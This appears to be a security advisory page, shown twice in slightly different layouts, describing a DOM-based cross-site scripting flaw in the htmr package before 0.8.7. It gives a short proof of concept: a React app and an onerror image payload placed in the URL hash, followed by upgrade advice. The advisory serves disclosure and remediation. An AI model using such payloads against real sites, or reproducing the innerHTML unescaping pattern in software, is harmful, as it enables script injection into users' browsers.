Vulnerability	Vulnerable Version
M Cross-site Sripting (XSS) htmr is a simple and lightweight conversion library from HTML string to react element coversions. Affected versions of this package are vulnerable to Cross-site Sripting (XSS). This module uses `innerHTML` ref to unescape HTML entities. This leads to DOM-based XSS by inserting HTML-encoded XSS payload (see PoC). PoC Create a React app: `create-react-app xss-htmr` Install `htmr` module: `cd xss-htmr; npm i htmr` Edit `src/App.js` file to this: import React from 'react'; import convert from 'htmr'; export default function App() { return convert(`<p>Hash: ${window.location.hash}</p>`); } Run the server: `npm run start` Visit `http://localhost:3000/#<img/src/onerror=alert('xss')>`, an alert will popup. How to fix Cross-site Sripting (XSS)? Upgrade `htmr` to version 0.8.7 or higher.	<0.8.7

Cross-site Sripting (XSS)

htmr is a simple and lightweight conversion library from HTML string to react element coversions.

Affected versions of this package are vulnerable to Cross-site Sripting (XSS). This module uses innerHTML ref to unescape HTML entities. This leads to DOM-based XSS by inserting HTML-encoded XSS payload (see PoC).

PoC

Create a React app: create-react-app xss-htmr
Install htmr module: cd xss-htmr; npm i htmr
Edit src/App.js file to this:

import React from 'react';
import convert from 'htmr';

export default function App() {
  return convert(`<p>Hash: ${window.location.hash}</p>`);
}

Run the server: npm run start
Visit http://localhost:3000/#<img/src/onerror=alert('xss')>, an alert will popup.

How to fix Cross-site Sripting (XSS)?

Upgrade htmr to version 0.8.7 or higher.

<0.8.7

Go back to all versions of this package